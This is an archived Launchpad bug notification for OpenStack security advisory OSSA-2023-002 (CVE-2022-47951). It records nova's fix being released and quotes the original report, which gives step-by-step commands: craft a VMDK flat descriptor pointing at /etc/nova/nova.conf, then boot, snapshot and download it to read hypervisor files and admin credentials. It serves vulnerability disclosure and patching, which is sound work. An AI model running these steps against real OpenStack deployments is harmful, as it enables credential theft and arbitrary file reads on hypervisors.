← Back to team overview

yahoo-eng-team team mailing list archive

[Bug 1996188] Re: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951)

 

https://review.opendev.org/c/openstack/nova/+/871612 is now merged,
putting the bug report to Fix Released.

** Changed in: nova
   Importance: Undecided => Critical

** Changed in: nova
       Status: New => Confirmed

** Changed in: nova
       Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat
  descriptor (CVE-2022-47951)

Status in Cinder:
  In Progress
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The vulnerability managers received the following report from
  Sébastien Meriot with OVH via encrypted E-mail:

  Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
  After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here is the details :
  By using a VMDK file, you can dump any file on the hypervisor.
  1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
  2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
  3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
  4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
  5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
  6. Download the image: openstack image save --file leak-instance-image leak-instance-image
  7. You get access to the nova.conf file content and you can get access to the openstack admin creds.

  We are working on a fix and would be happy to share it with you if needed.
  We think it does affect Nova but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC]

  cinder seems also affected

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1996188/+subscriptions